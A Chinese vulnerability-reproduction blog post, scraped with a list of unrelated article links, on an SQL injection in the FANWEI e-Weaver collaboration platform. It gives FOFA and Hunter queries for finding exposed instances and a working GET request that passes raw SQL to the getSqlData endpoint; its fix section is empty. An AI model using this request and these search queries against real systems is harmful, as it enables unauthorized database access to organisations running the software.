当前位置: 首页 > news >正文

【漏洞复现】泛微e-Weaver SQL注入

漏洞描述

泛微e-Weaver(FANWEI e-Weaver)是一款广泛应用于企业数字化转型领域的集成协同管理平台。作为中国知名的企业级软件解决方案提供商,泛微软件(广州)股份有限公司开发和推广了e-Weaver平台。
泛微e-Weaver旨在帮助企业实现信息化管理、业务协同和数字化转型。该平台提供了一系列的功能模块,包括企业门户、流程管理、文档管理、知识管理、协同办公、人力资源管理、客户关系管理等。这些模块可以根据企业的实际需求进行定制和配置,以满足不同行业和组织的特定需求。
在这里插入图片描述

免责声明

技术文章仅供参考,任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得利用网络从事危害国家安全、荣誉和利益,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。本文所提供的工具仅用于学习,禁止用于其他!!

资产确定

fofa     app="泛微-E-Weaver"
hunter   app.name="泛微 e-Weaver"

漏洞复现

GET /Api/portal/elementEcodeAddon/getSqlData?sql=select%20@@version HTTP/1.1
Host: 

在这里插入图片描述

修复方案

相关文章:

  • ubuntu中/etc/rc.local和/etc/init.d/rc.local的区别是什么
  • zookeperkafka学习
  • (带教程)商业版SEO关键词按天计费系统:关键词排名优化、代理服务、手机自适应及搭建教程
  • Linux操作系统使用及C高级编程-D5Linux shell命令(进程管理、用户管理)
  • 黑马React18: 基础Part 1
  • 遗传算法GA-算法原理与算法流程图
  • 搭建 AI 图像生成器 (SAAS) php laravel
  • python django 小程序博客源码
  • 杭州-区块链前瞻性论坛邀请函​
  • (Matalb回归预测)PSO-BP粒子群算法优化BP神经网络的多维回归预测
  • 基于STM32的多组外部中断(EXTI)的优化策略与应用
  • 春秋云境靶场CVE-2022-28512漏洞复现(sql手工注入)
  • 阿里面试面试题
  • Linux非阻塞等待示例
  • 【科技素养】蓝桥杯STEMA 科技素养组模拟练习试卷B
  • [Vue CLI 3] 配置解析之 css.extract
  • android图片蒙层
  • angular2 简述
  • git 常用命令
  • JavaScript 奇技淫巧
  • Java程序员幽默爆笑锦集
  • MYSQL 的 IF 函数
  • Otto开发初探——微服务依赖管理新利器
  • PHP 的 SAPI 是个什么东西
  • Python打包系统简单入门
  • 测试开发系类之接口自动化测试
  • 从零开始学习部署
  • 如何使用 OAuth 2.0 将 LinkedIn 集成入 iOS 应用
  • 树莓派 - 使用须知
  • 智能合约开发环境搭建及Hello World合约
  • 白色的风信子
  • NLPIR智能语义技术让大数据挖掘更简单
  • postgresql行列转换函数
  • # 20155222 2016-2017-2 《Java程序设计》第5周学习总结
  • #1014 : Trie树
  • #pragma 指令
  • $.ajax()方法详解
  • (附源码)springboot炼糖厂地磅全自动控制系统 毕业设计 341357
  • (免费领源码)python+django+mysql线上兼职平台系统83320-计算机毕业设计项目选题推荐
  • (万字长文)Spring的核心知识尽揽其中
  • (一)spring cloud微服务分布式云架构 - Spring Cloud简介
  • (转)mysql使用Navicat 导出和导入数据库
  • ***利用Ms05002溢出找“肉鸡
  • .describe() python_Python-Win32com-Excel
  • .NET Core 和 .NET Framework 中的 MEF2
  • .NET MVC第三章、三种传值方式
  • .NET/C# 将一个命令行参数字符串转换为命令行参数数组 args
  • .net2005怎么读string形的xml,不是xml文件。
  • .Net接口调试与案例
  • @vue/cli脚手架
  • [ 云计算 | AWS ] 对比分析:Amazon SNS 与 SQS 消息服务的异同与选择
  • [17]JAVAEE-HTTP协议
  • [2016.7 test.5] T1
  • [boost]使用boost::function和boost::bind产生的down机一例
  • [C++核心编程](四):类和对象——封装